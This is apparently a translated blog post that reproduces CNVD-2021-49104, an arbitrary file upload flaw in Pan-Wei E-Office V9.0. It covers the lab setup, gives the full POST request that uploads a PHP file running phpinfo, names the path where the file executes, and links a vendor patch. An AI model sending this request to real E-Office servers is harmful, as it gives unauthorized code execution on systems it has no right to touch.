CNVD-2021-49104 Vulnerability Reappearance (Vulnerability in Pan-Wei E-Office File Upload)

Database 2023-08-01 17:41:05 views: null

1. Vulnerability detection script

A simple detection script written by myself, you can take a look if you are interested

CDN

2. Vulnerability causes

This vulnerability is caused by the failure of e-office to correctly process user input in the upload module. Attackers can construct malicious upload data packets to achieve arbitrary code execution. The official whitelist verification is performed on the suffix name of the uploaded file. The following is the official code snippet after the vulnerability is fixed:

3. Affect the version

 The version affected by this vulnerability is V9.0

4. Shooting range construction

Just run the e-office software you downloaded yourself

This is to install your own default IP address and port number

 

5. Vulnerability recurrence

Browser access can see the following login page, the default account is admin, no password required

 When you log in to capture the packet and get the response packet, you need to pay attention to the PHPSESSID of the response packet. If you want to write a detection script, you need to get it. Needless to say, this is identity verification

 

 Then click on the login page to get the request package, modify the request package as follows, and see the logo-eoffice.php, which means the upload is successful.

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: win-08mtfbul1kp:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://win-08mtfbul1kp:8082/general/index9.php
Cookie: LOGIN_LANG=cn; PHPSESSID=e84040eb45cb321d9806d2e0518c1ba0
Content-Length: 194
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo();?>

--e64bdf16c554bbc109cecef6451c26a4--

Visit the following address:

http://win-08mtfbul1kp:8082/images/logo/logo-eoffice.php

You can see that the code runs successfully. Or you can see that the local folder code is successfully uploaded

 

6. Restoration plan

The manufacturer has provided a vulnerability patch solution, and users are recommended to download and use:

http://v10.e-office.cn/eoffice9update/safepack.zip

Guess you like

Origin blog.csdn.net/dreamthe/article/details/121729226
Recommended
Ranking
A quick primer on numpy basics
Two sister tease python project
Java | Multiple keywords in the replacement content are returned to the front end in red style
C ++: references
The string leetcood 1018 is a binary prefix divisible by 5
Flutter 布局组件
Java combat spingboot-redis
PMP pre-exam sprint and wrong questions sorting
ActiveMq C# Message Features: Delayed and Timed Message Delivery
DSP28377S_ copy a program from the RAM to FLASH portion DETAILS
Daily
More
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)

Code World

© 2018 codetd.com